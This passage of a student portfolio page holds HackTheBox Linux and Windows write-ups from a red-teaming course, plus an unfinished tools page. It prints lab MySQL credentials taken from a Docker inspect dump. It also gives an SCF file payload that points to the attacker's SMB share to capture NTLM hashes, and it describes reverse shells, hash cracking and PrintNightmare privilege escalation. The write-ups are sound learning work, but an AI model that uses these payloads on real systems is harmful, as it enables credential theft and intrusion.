          <a href="img/portfolio/minor/red/htb_linux/HashingToolLSResult.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashingToolLSResult.png" alt=""></a>
          <p>Looks like it worked now lets try to get a reverse shell.</p>
          <a href="img/portfolio/minor/red/htb_linux/HashingToolReverseShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashingToolReverseShell.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/WWW-DataShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WWW-DataShell.png" alt=""></a>
          <p>And we're in! I looked in the /etc/passwd and noticed another user named www-adm which
          looked like the next user I needed. After looking around for a bit and I couldn't find
          anything I thought what if they reused passwords?</p>
          <a href="img/portfolio/minor/red/htb_linux/WWW-AdmShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WWW-AdmShell.png" alt=""></a>
          <p>And they did so now we have www-adm shell. After looking around I noticed a .wgetrc file
          with some credentials in it. Because it looked like docker was running on the machine I
          thought http://api:5000/ was my best bet.</p>
          <a href="img/portfolio/minor/red/htb_linux/WGETAPI.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WGETAPI.png" alt=""></a>
          <p>And it was! Apparently there is a check_db endpoint but it required credentials. So I
          tried to credentials we've just found.</p>
          <a href="img/portfolio/minor/red/htb_linux/CatCheckDB.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CatCheckDB.png" alt=""></a>
          <p>Looks like JSON but we first need to prettify it to make it more readable.</p>
          <pre style="text-align: left">                                <code class="prettyprint">
                                              {
             "message":{
                "AppArmorProfile":"docker-default",
                "Args":[
                   "--character-set-server=utf8mb4",
                   "--collation-server=utf8mb4_bin",
                   "--skip-character-set-client-handshake",
                   "--max_allowed_packet=50MB",
                   "--general_log=0",
                   "--sql_mode=ANSI_QUOTES,ERROR_FOR_DIVISION_BY_ZERO,IGNORE_SPACE,NO_ENGINE_SUBSTITUTION,NO_ZERO_DATE,NO_ZERO_IN_DATE,PIPES_AS_CONCAT,REAL_AS_FLOAT,STRICT_ALL_TABLES"
                ],
                "Config":{
                   "AttachStderr":false,
                   "AttachStdin":false,
                   "AttachStdout":false,
                   "Cmd":[
                      "--character-set-server=utf8mb4",
                      "--collation-server=utf8mb4_bin",
                      "--skip-character-set-client-handshake",
                      "--max_allowed_packet=50MB",
                      "--general_log=0",
                      "--sql_mode=ANSI_QUOTES,ERROR_FOR_DIVISION_BY_ZERO,IGNORE_SPACE,NO_ENGINE_SUBSTITUTION,NO_ZERO_DATE,NO_ZERO_IN_DATE,PIPES_AS_CONCAT,REAL_AS_FLOAT,STRICT_ALL_TABLES"
                   ],
                   "Domainname":"",
                   "Entrypoint":[
                      "docker-entrypoint.sh"
                   ],
                   "Env":[
                      "MYSQL_DATABASE=db",
                      "MYSQL_USER=drew",
                      "MYSQL_PASSWORD=drew",
                      "MYSQL_ROOT_PASSWORD=XeoNu86JTznxMCQuGHrGutF3Csq5",
                      "SERVICE_TAGS=dev",
                      "SERVICE_NAME=mysql",
                      "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
                      "GOSU_VERSION=1.12",
                      "MYSQL_MAJOR=8.0",
                      "MYSQL_VERSION=8.0.25-1debian10"
                   ],
                   "ExposedPorts":{
                      "3306/tcp":{
          
                      },
                      "33060/tcp":{
          
                      }
                   },
                   "Healthcheck":{
                      "Interval":5000000000,
                      "Retries":3,
                      "Test":[
                         "CMD-SHELL",
                         "mysqladmin ping -h 127.0.0.1 --user=$MYSQL_USER -p$MYSQL_PASSWORD --silent"
                      ],
                      "Timeout":2000000000
                   },
                   "Hostname":"mysql",
                   "Image":"mysql:latest",
                   "Labels":{
                      "com.docker.compose.config-hash":"947cb358bc0bb20b87239b0dffe00fd463bd7e10355f6aac2ef1044d8a29e839",
                      "com.docker.compose.container-number":"1",
                      "com.docker.compose.oneoff":"False",
                      "com.docker.compose.project":"app",
                      "com.docker.compose.project.config_files":"docker-compose.yml",
                      "com.docker.compose.project.working_dir":"/root/app",
                      "com.docker.compose.service":"mysql",
                      "com.docker.compose.version":"1.29.1"
                   },
                   "OnBuild":null,
                   "OpenStdin":false,
                   "StdinOnce":false,
                   "Tty":true,
                   "User":"",
                   "Volumes":{
                      "/docker-entrypoint-initdb.d":{
          
                      },
                      "/var/lib/mysql":{
          
                      }
                   },
                   "WorkingDir":""
                },
                "Created":"2021-10-04T06:57:43.698655618Z",
                "Driver":"overlay2",
                "ExecIDs":null,
                "GraphDriver":{
                   "Data":{
                      "LowerDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d-init/diff:/var/lib/docker/overlay2/ecc064365b0367fc58ac796d9d5fe020d9453c68e2563f8f6d4682e38231083e/diff:/var/lib/docker/overlay2/4a21c5c296d0e6d06a3e44e3fa4817ab6f6f8c3612da6ba902dc28ffd749ec4d/diff:/var/lib/docker/overlay2/f0cdcc7bddc58609f75a98300c16282d8151ce18bd89c36be218c52468b3a643/diff:/var/lib/docker/overlay2/01e8af3c602aa396e4cb5af2ed211a6a3145337fa19b123f23e36b006d565fd0/diff:/var/lib/docker/overlay2/55b88ae64530676260fe91d4d3e6b0d763165505d3135a3495677cb10de74a66/diff:/var/lib/docker/overlay2/4064491ac251bcc0b677b0f76de7d5ecf0c17c7d64d7a18debe8b5a99e73e127/diff:/var/lib/docker/overlay2/a60c199d618b0f2001f106393236ba394d683a96003a4e35f58f8a7642dbad4f/diff:/var/lib/docker/overlay2/29b638dc55a69c49df41c3f2ec0f90cc584fac031378ae455ed1458a488ec48d/diff:/var/lib/docker/overlay2/ee59a9d7b93adc69453965d291e66c7d2b3e6402b2aef6e77d367da181b8912f/diff:/var/lib/docker/overlay2/4b5204c09ec7b0cbf22d409408529d79a6d6a472b3c4d40261aa8990ff7a2ea8/diff:/var/lib/docker/overlay2/8178a3527c2a805b3c2fe70e179797282bb426f3e73e8f4134bc2fa2f2c7aa22/diff:/var/lib/docker/overlay2/76b10989e43e43406fc4306e789802258e36323f7c2414e5e1242b6eab4bd3eb/diff",
                      "MergedDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d/merged",
                      "UpperDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d/diff",
                      "WorkDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d/work"
                   },
                   "Name":"overlay2"
                },
                "HostConfig":{
                   "AutoRemove":false,
                   "Binds":[
                      "/root/app/scripts/init.d:/docker-entrypoint-initdb.d:ro",
                      "app_vol_mysql:/var/lib/mysql:rw"
                   ],
                   "BlkioDeviceReadBps":null,
                   "BlkioDeviceReadIOps":null,
                   "BlkioDeviceWriteBps":null,
                   "BlkioDeviceWriteIOps":null,
                   "BlkioWeight":0,
                   "BlkioWeightDevice":null,
                   "CapAdd":[
                      "SYS_NICE"
                   ],
                   "CapDrop":null,
                   "Cgroup":"",
                   "CgroupParent":"",
                   "CgroupnsMode":"host",
                   "ConsoleSize":[
                      0,
                      0
                   ],
                   "ContainerIDFile":"",
                   "CpuCount":0,
                   "CpuPercent":0,
                   "CpuPeriod":0,
                   "CpuQuota":0,
                   "CpuRealtimePeriod":0,
                   "CpuRealtimeRuntime":0,
                   "CpuShares":0,
                   "CpusetCpus":"",
                   "CpusetMems":"",
                   "DeviceCgroupRules":null,
                   "DeviceRequests":null,
                   "Devices":null,
                   "Dns":null,
                   "DnsOptions":null,
                   "DnsSearch":null,
                   "ExtraHosts":null,
                   "GroupAdd":null,
                   "IOMaximumBandwidth":0,
                   "IOMaximumIOps":0,
                   "IpcMode":"private",
                   "Isolation":"",
                   "KernelMemory":0,
                   "KernelMemoryTCP":0,
                   "Links":null,
                   "LogConfig":{
                      "Config":{
          
                      },
                      "Type":"json-file"
                   },
                   "MaskedPaths":[
                      "/proc/asound",
                      "/proc/acpi",
                      "/proc/kcore",
                      "/proc/keys",
                      "/proc/latency_stats",
                      "/proc/timer_list",
                      "/proc/timer_stats",
                      "/proc/sched_debug",
                      "/proc/scsi",
                      "/sys/firmware"
                   ],
                   "Memory":0,
                   "MemoryReservation":0,
                   "MemorySwap":0,
                   "MemorySwappiness":null,
                   "NanoCpus":0,
                   "NetworkMode":"app_nw",
                   "OomKillDisable":false,
                   "OomScoreAdj":0,
                   "PidMode":"",
                   "PidsLimit":null,
                   "PortBindings":{
          
                   },
                   "Privileged":false,
                   "PublishAllPorts":false,
                   "ReadonlyPaths":[
                      "/proc/bus",
                      "/proc/fs",
                      "/proc/irq",
                      "/proc/sys",
                      "/proc/sysrq-trigger"
                   ],
                   "ReadonlyRootfs":false,
                   "RestartPolicy":{
                      "MaximumRetryCount":0,
                      "Name":"always"
                   },
                   "Runtime":"runc",
                   "SecurityOpt":null,
                   "ShmSize":67108864,
                   "UTSMode":"",
                   "Ulimits":null,
                   "UsernsMode":"",
                   "VolumeDriver":"",
                   "VolumesFrom":[
          
                   ]
                },
                "HostnamePath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/hostname",
                "HostsPath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/hosts",
                "Id":"47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216",
                "Image":"sha256:5c62e459e087e3bd3d963092b58e50ae2af881076b43c29e38e2b5db253e0287",
                "LogPath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216-json.log",
                "MountLabel":"",
                "Mounts":[
                   {
                      "Destination":"/docker-entrypoint-initdb.d",
                      "Mode":"ro",
                      "Propagation":"rprivate",
                      "RW":false,
                      "Source":"/root/app/scripts/init.d",
                      "Type":"bind"
                   },
                   {
                      "Destination":"/var/lib/mysql",
                      "Driver":"local",
                      "Mode":"rw",
                      "Name":"app_vol_mysql",
                      "Propagation":"",
                      "RW":true,
                      "Source":"/var/lib/docker/volumes/app_vol_mysql/_data",
                      "Type":"volume"
                   }
                ],
                "Name":"/mysql",
                "NetworkSettings":{
                   "Bridge":"",
                   "EndpointID":"",
                   "Gateway":"",
                   "GlobalIPv6Address":"",
                   "GlobalIPv6PrefixLen":0,
                   "HairpinMode":false,
                   "IPAddress":"",
                   "IPPrefixLen":0,
                   "IPv6Gateway":"",
                   "LinkLocalIPv6Address":"",
                   "LinkLocalIPv6PrefixLen":0,
                   "MacAddress":"",
                   "Networks":{
                      "app_nw":{
                         "Aliases":[
                            "47c78eb0450f",
                            "mysql"
                         ],
                         "DriverOpts":null,
                         "EndpointID":"50037fb137fd880f88a9efd17eb8cf94bf8142ec263080b4c904afeeaa79aa2e",
                         "Gateway":"172.18.0.1",
                         "GlobalIPv6Address":"",
                         "GlobalIPv6PrefixLen":0,
                         "IPAMConfig":{
                            "IPv4Address":"172.18.0.100"
                         },
                         "IPAddress":"172.18.0.100",
                         "IPPrefixLen":16,
                         "IPv6Gateway":"",
                         "Links":null,
                         "MacAddress":"02:42:ac:12:00:64",
                         "NetworkID":"021b24b8b3e1e3638463eeb7dc9af59c36cc412578cdf51931a24f04ea6f5532"
                      }
                   },
                   "Ports":{
                      "3306/tcp":null,
                      "33060/tcp":null
                   },
                   "SandboxID":"99cbb57fded2142e5dad46330b43249d2866f8514fb4342d06322f3e3b5c60f1",
                   "SandboxKey":"/var/run/docker/netns/99cbb57fded2",
                   "SecondaryIPAddresses":null,
                   "SecondaryIPv6Addresses":null
                },
                "Path":"docker-entrypoint.sh",
                "Platform":"linux",
                "ProcessLabel":"",
                "ResolvConfPath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/resolv.conf",
                "RestartCount":0,
                "State":{
                   "Dead":false,
                   "Error":"",
                   "ExitCode":0,
                   "FinishedAt":"0001-01-01T00:00:00Z",
                   "Health":{
                      "FailingStreak":0,
                      "Log":[
                         {
                            "End":"2021-10-04T17:08:01.998027574+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:01.908189033+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:07.080804898+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:07.000613396+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:12.166584919+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:12.083845791+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:17.254375293+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:17.16894306+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:22.350400823+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:22.257747436+02:00"
                         }
                      ],
                      "Status":"healthy"
                   },
                   "OOMKilled":false,
                   "Paused":false,
                   "Pid":1108,
                   "Restarting":false,
                   "Running":true,
                   "StartedAt":"2021-10-04T06:57:47.409835076Z",
                   "Status":"running"
                }
             },
             "status":200
          }
                                          </code>
                                      </pre>
          <p>Looks like an username and some passwords lets try those with ssh.</p>
          <a href="img/portfolio/minor/red/htb_linux/UserFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/UserFlag.png" alt=""></a>
          <p>We got the user flag! But now we need to find something to escalate our privileges. We
          could use LinPEAS to try and find something but we first have to get it on this
          machine.</p>
          <a href="img/portfolio/minor/red/htb_linux/SimpleHTTPServer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SimpleHTTPServer.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/WGETLinpeas.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WGETLinpeas.png" alt=""></a>
          <p>I used SimpleHTTPServer to get LinPeas from my machine to the target machine because the
          target machine didn't have access to the internet. Now we need to run LinPEAS.</p>
          <a href="img/portfolio/minor/red/htb_linux/LinpeasMail.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LinpeasMail.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/LinpeasDockerIP.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LinpeasDockerIP.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/LinpeasDockerFolder.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LinpeasDockerFolder.png" alt=""></a>
          <p>Looks like LinPEAS found some interesting stuff like a mail message to Drew and the
          docker ip ranges and a docker folder that is edited regularly.</p>
          <a href="img/portfolio/minor/red/htb_linux/Mail.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Mail.png" alt=""></a>
          <p>This probably means that the docker folder that gets edited regularly is the folder
          containing the game. And that some script is running that we could use.</p>
          <a href="img/portfolio/minor/red/htb_linux/DrewPublicKey.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DrewPublicKey.png" alt=""></a>
          <p>Looks like we got a public key as game-tester as well. Lets try to login into the docker
          ips using this public key.</p>
          <a href="img/portfolio/minor/red/htb_linux/Game-testerShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Game-testerShell.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/SharedFolderGame-tester.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SharedFolderGame-tester.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/SharedFolderDrew.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SharedFolderDrew.png" alt=""></a>
          <p>And it worked now we got a shell as game-tester as well on a docker container. I noticed
          that the same docker folder on Drew also exists on the docker container and that they
          are shared. I also noticed that the docker folder get rewritten entirely so all files
          inside get removed and replaced before the server is restarted again. Lets see what the
          script does.</p>
          <a href="img/portfolio/minor/red/htb_linux/CatNode-server.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CatNode-server.png" alt=""></a>
          <p>It runs in a folder called /usr/src/app which doesn't exist on the Drew user but it does
          on the game-tester container. So lets look at that as well.</p>
          <a href="img/portfolio/minor/red/htb_linux/CatServerJS.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CatServerJS.png" alt=""></a>
          <p>Look like we can crash the server if we make a POST to autoplay with a decimal instead of
          an integer. But that doesn't get us anywhere we need to infect the node-server.sh
          first.</p>
          <a href="img/portfolio/minor/red/htb_linux/DrewPublicKey.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DrewPublicKey.png" alt=""></a>
          <p>I found this <a href="https://book.hacktricks.xyz/linux-unix/privilege-escalation/docker-breakout">website</a>
          explaining priv esc with docker so I gave it a try. But I have to be faster than the
          server can create the node-server.sh in order to infect it. So I created a script.</p>
          <a href="img/portfolio/minor/red/htb_linux/RogueNode-server.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/RogueNode-server.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/ExploitLoop.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/ExploitLoop.png" alt=""></a>
          <p>This should create a bash file in /tmp on the game-tester container that is executable by
          game-tester in order to priv esc. So lets crash the server and try it.</p>
          <a href="img/portfolio/minor/red/htb_linux/ExploitRun.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/ExploitRun.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/CrashGameServer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CrashGameServer.png" alt=""></a>
          <p>I had to give it a few tries in order to succeed because in some cases the server was
          actually faster than my script.</p>
          <a href="img/portfolio/minor/red/htb_linux/RootOnDocker.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/RootOnDocker.png" alt=""></a>
          <p>And it worked now we need to do the same thing in order to get root on the Drew machine
          but this time we don't have to worry about speed because we don't need to infect a
          script, we just have to do it fast enough before all the files inside the folder get
          deleted again.</p>
          <a href="img/portfolio/minor/red/htb_linux/InfectBashAsGame-tester.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/InfectBashAsGame-tester.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/RootFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/RootFlag.png" alt=""></a>
          <p>That's it! We are root and got the flag!</p>
          <p>Although it took me quite a while to root this machine it was a really fun one.
          Containing a lot of different exploits mostly straight from the OWASP top 10 but also
          some I never heard of before like the docker priv esc.</p>
          <ul class="list-inline">
          <li>Date: October 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal22" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">HackTheBox Windows Write-up</p>
          <a href="img/portfolio/minor/red/htb_windows/DriverCard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/DriverCard.png" alt=""></a>
          <p>First lets start with the basic enumeration and do a NMap.</p>
          <a href="img/portfolio/minor/red/htb_windows/NMapOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/NMapOutput.png" alt=""></a>
          <p>When navigating to the webpage we are greeted by a login screen. After some searching and
          not finding anything useful I tried to login with just a default password admin:admin it
          was a longshot but it worked!</p>
          <a href="img/portfolio/minor/red/htb_windows/Dashboard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/Dashboard.png" alt=""></a>
          <p>The only button that worked on the website was Firmware updates where you can upload a
          file. Knowing that SMB was also an open port I found this <a href="https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/">website</a>
          this could potentially it so lets try it out.
          </p>
          <pre style="text-align: left">                                <code class="prettyprint">
                                              [Shell]
                                              Command=2
                                              Iconfile=\\10.10.14.161\share\test.ico
                                              [Taskbar]
                                              Command=ToggleDesktop
                                          </code>
                                      </pre>
          <a href="img/portfolio/minor/red/htb_windows/ResponderOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/ResponderOutput.png" alt=""></a>
          <p>I created a payload like the example given on the site I found started responder and got
          a few hits. Now we know the username and maybe the password if we manage to crack
          it. We know from the responder output that it is a NTLM hash so lets put Hashcat on it
          and see what we'll get.</p>
          <a href="img/portfolio/minor/red/htb_windows/HashcatOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/HashcatOutput.png" alt=""></a>
          <p>Hashcat cracked the password with ease and now we can take a look at the SMB folder to
          see if we can find anything interesting.</p>
          <a href="img/portfolio/minor/red/htb_windows/SMBMap.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/SMBMap.png" alt=""></a>
          <p>We didn't find anything interesting but knowing from the NMap output we also know that
          the RDP port is open so maybe it uses the same password.</p>
          <a href="img/portfolio/minor/red/htb_windows/UserFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/UserFlag.png" alt=""></a>
          <p>This was indeed the case and now we already have the user flag. For priv esc running at
          least WinPEAS is a no-brainer. So I used SimpleHTTPServer to get WinPEAS on the target
          machine.</p>
          <a href="img/portfolio/minor/red/htb_windows/SimpleHTTPServer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/SimpleHTTPServer.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_windows/WgetWinpeas.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/WgetWinpeas.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_windows/ProcessPrintSpool.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/ProcessPrintSpool.png" alt=""></a>
          <p>Really the only interesting thing WinPEAS found was a Print spooler process. After some
          Googling I stubled across <a href="https://github.com/calebstewart/CVE-2021-1675">this</a> CVE. So lets get
          that exploit on the target machine in the same way we did with WinPEAS.</p>
          <a href="img/portfolio/minor/red/htb_windows/WgetPrintNightmare.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/WgetPrintNightmare.png" alt=""></a>
          <p>I wasn't able to run the script because of some permission issues, but after some
          Googling I found out I could just set the policy to unrestricted.</p>
          <a href="img/portfolio/minor/red/htb_windows/RunExploit.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/RunExploit.png" alt=""></a>
          <p>I ran the exploit and it created a new administrator account for me with a username and
          password that I chose and know. Now the only thing that's left is just to logout as this
          user and login with our new user.</p>
          <a href="img/portfolio/minor/red/htb_windows/RootFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/RootFlag.png" alt=""></a>
          <p>And that's it! We have the root flag! This box wasn't that hard but still fun and
          sometimes challenging due to my lack of knowledge of Windows hacking. Overall a fun
          learning experience.</p>
          <ul class="list-inline">
          <li>Date: October 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal23" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal24" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal25" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">My personal pen-testing toolboxes</p>
          <p>Like every other profession good tools make a world of difference on the quality and
          efficiency of the end product. This isn't any different with cyber security. Good tools
          can improve results providing you with more information and helping with getting to the
          results faster.</p>
          <h3>On the road</h3>
          <a href="img/portfolio/minor/red/kalilinux.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/kalilinux.jpg" alt=""></a>
          <p>On the road when I'm on my laptop I like to use Kali Linux. It's just convenient that it
          comes pre-loaded with all the tools you need, and it runs fairly lightweight on older
          laptops. The "kali-undercover" command is also a fun little gimmick that changes your
          Kali desktop to a Windows clone which for a random passer by looks just like a regular
          Windows machine. Making it incognito to use Kali whenever you're in a public space and
          want to keep a low profile.</p>
          <h3>At home</h3>
          <a href="img/portfolio/minor/red/parrotos.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/parrotos.jpg" alt=""></a>
          <p>At home on my main desktop PC I recently switched to natively running ParrotOS. This was
          because I liked to try something new and the reviews were good. It comes pre-loaded with
          the same tools as kali and a few extra tools like diverting all traffic trough tor
          making the machine even more anonymous. The user experience is a little better and just
          overall a good looking distro. This comes at a cost because it takes more resources to
          run. This isn't a problem on my PC because it's quite powerful and I don't have to think
          about battery life. Alongside ParrotOS I run a Windows VM in qemu with WinApps running
          on Linux which enables me to run any Windows application I want on Linux. I mostly use
          it for Microsoft Office products.</p>
          <h3>Cloud</h3>
          <a href="img/portfolio/minor/red/googlecloudconsole.PNG"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/googlecloudconsole.PNG" alt=""></a>
          <p>Google cloud console is an awesome way to always have a Linux machine at your disposal
          where ever you are. It's fully cloud based and free to use. So when you're in need of a
          Linux terminal and you have access to a browser you're set. The only downside is that
          the machine is volatile so when you shut it down it is gone. This requires you to always
          re-install tools and such. Luckily due to it running on Google cloud it is pretty fast.
          Just overall a good tool to know about.</p>
          <a href="img/portfolio/minor/red/guacamole.PNG"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/guacamole.PNG" alt=""></a>
          <p>Now Guacamole is kinda like Google cloud console, but it's self-hosted. It can turn any
          machine with a SSH server into a cloud based web terminal accessible from any browser
          where ever you are. It takes a little time and effort to set it up but it is worth it.
          All the benefits from Google cloud console but your data is hosted by you and it is
          saved. In my case I installed Kali Linux on a docker server and now I can access it
          whenever I need to it doesn't matter if I'm on Windows, Linux or even my phone.</p>
          <a href="img/portfolio/minor/red/guacamoleconsole.PNG"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/guacamoleconsole.PNG" alt=""></a>
          <h3>Windows</h3>
          <a href="img/portfolio/minor/red/wsl.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/wsl.jpg" alt=""></a>
